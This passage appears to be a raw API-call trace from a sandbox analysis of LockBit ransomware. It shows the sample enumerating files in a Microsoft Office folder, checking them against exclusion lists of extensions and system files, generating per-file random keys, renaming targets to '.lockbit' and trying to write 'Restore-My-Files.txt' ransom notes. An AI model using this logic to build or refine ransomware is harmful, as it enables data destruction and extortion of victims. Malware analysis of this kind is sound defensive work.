pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.771] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.772] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.772] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4af05900, ftCreationTime.dwHighDateTime=0x1bf1522, ftLastAccessTime.dwLowDateTime=0xbd61d940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4af05900, ftLastWriteTime.dwHighDateTime=0x1bf1522, nFileSizeHigh=0x0, nFileSizeLow=0x20ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0292152.WMF", cAlternateFileName="")) returned 1 [0197.772] lstrcmpiW (lpString1=".", lpString2="J0292152.WMF") returned -1 [0197.772] lstrcmpiW (lpString1="..", lpString2="J0292152.WMF") returned -1 [0197.772] PathFindExtensionW (pszPath="J0292152.WMF") returned=".WMF" [0197.772] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.772] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.772] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.772] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.772] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.772] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.772] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.772] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.772] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.772] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.772] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.772] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.772] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.772] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.772] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.772] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.772] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.773] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.773] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.774] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.774] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.774] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0292152.WMF") returned 1 [0197.774] lstrcmpiW (lpString1="ntldr", lpString2="J0292152.WMF") returned 1 [0197.774] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0292152.WMF") returned 1 [0197.774] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0292152.WMF") returned -1 [0197.774] lstrcmpiW (lpString1="autorun.inf", lpString2="J0292152.WMF") returned -1 [0197.774] lstrcmpiW (lpString1="thumbs.db", lpString2="J0292152.WMF") returned 1 [0197.774] lstrcmpiW (lpString1="iconcache.db", lpString2="J0292152.WMF") returned -1 [0197.774] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.774] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292152.WMF") returned=".WMF" [0197.774] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.774] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.774] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.774] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.774] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.774] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.774] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.774] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.774] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.774] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.774] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.774] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.774] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.774] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.774] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.775] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.775] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.775] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.775] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.775] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.775] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.775] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.775] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.775] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.775] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.775] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.775] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.775] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.775] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292152.WMF.lockbit") returned 70 [0197.775] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292152.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0292152.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.777] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.777] malloc (_Size=0x40068) returned 0x3df0008 [0197.777] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8398) returned 1 [0197.777] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.777] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.777] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.778] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.778] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.782] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292152.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292152.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.782] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.782] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.783] free (_Block=0x1fa2ed8) [0197.783] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292152.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.783] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.784] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.784] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48b60800, ftCreationTime.dwHighDateTime=0x1bf16a4, ftLastAccessTime.dwLowDateTime=0xbd61d940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x48b60800, ftLastWriteTime.dwHighDateTime=0x1bf16a4, nFileSizeHigh=0x0, nFileSizeLow=0x998, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0292982.WMF", cAlternateFileName="")) returned 1 [0197.784] lstrcmpiW (lpString1=".", lpString2="J0292982.WMF") returned -1 [0197.784] lstrcmpiW (lpString1="..", lpString2="J0292982.WMF") returned -1 [0197.784] PathFindExtensionW (pszPath="J0292982.WMF") returned=".WMF" [0197.784] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.784] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.784] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.784] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.784] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.784] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.784] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.784] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.784] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.784] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.784] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.784] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.784] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.784] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.784] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.784] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.784] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.784] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.784] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.784] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.785] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.785] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.786] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0292982.WMF") returned 1 [0197.786] lstrcmpiW (lpString1="ntldr", lpString2="J0292982.WMF") returned 1 [0197.786] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0292982.WMF") returned 1 [0197.786] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0292982.WMF") returned -1 [0197.786] lstrcmpiW (lpString1="autorun.inf", lpString2="J0292982.WMF") returned -1 [0197.786] lstrcmpiW (lpString1="thumbs.db", lpString2="J0292982.WMF") returned 1 [0197.786] lstrcmpiW (lpString1="iconcache.db", lpString2="J0292982.WMF") returned -1 [0197.786] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.786] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292982.WMF") returned=".WMF" [0197.786] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.786] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.786] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.786] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.786] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.786] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.786] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.786] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.786] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.786] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.786] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.786] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.786] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.786] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.786] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.786] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.786] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.786] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.786] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.786] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.787] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.787] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.787] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.787] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.787] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.787] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.787] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.787] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.787] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292982.WMF.lockbit") returned 70 [0197.787] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292982.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0292982.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.788] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.788] malloc (_Size=0x40068) returned 0x3df0008 [0197.788] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2456) returned 1 [0197.788] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.789] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.789] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.789] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.789] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.794] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292982.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292982.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.794] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.794] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.794] free (_Block=0x1fa2ed8) [0197.794] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0292982.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.794] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.794] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.794] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9af72900, ftCreationTime.dwHighDateTime=0x1bf16a4, ftLastAccessTime.dwLowDateTime=0xbd61d940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x9af72900, ftLastWriteTime.dwHighDateTime=0x1bf16a4, nFileSizeHigh=0x0, nFileSizeLow=0x5ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0293234.WMF", cAlternateFileName="")) returned 1 [0197.795] lstrcmpiW (lpString1=".", lpString2="J0293234.WMF") returned -1 [0197.795] lstrcmpiW (lpString1="..", lpString2="J0293234.WMF") returned -1 [0197.795] PathFindExtensionW (pszPath="J0293234.WMF") returned=".WMF" [0197.795] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.795] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.796] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.796] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0293234.WMF") returned 1 [0197.796] lstrcmpiW (lpString1="ntldr", lpString2="J0293234.WMF") returned 1 [0197.797] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0293234.WMF") returned 1 [0197.797] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0293234.WMF") returned -1 [0197.797] lstrcmpiW (lpString1="autorun.inf", lpString2="J0293234.WMF") returned -1 [0197.797] lstrcmpiW (lpString1="thumbs.db", lpString2="J0293234.WMF") returned 1 [0197.797] lstrcmpiW (lpString1="iconcache.db", lpString2="J0293234.WMF") returned -1 [0197.797] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.797] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293234.WMF") returned=".WMF" [0197.797] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.797] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.797] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.797] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.797] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.797] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.797] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.797] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.797] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.797] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.797] 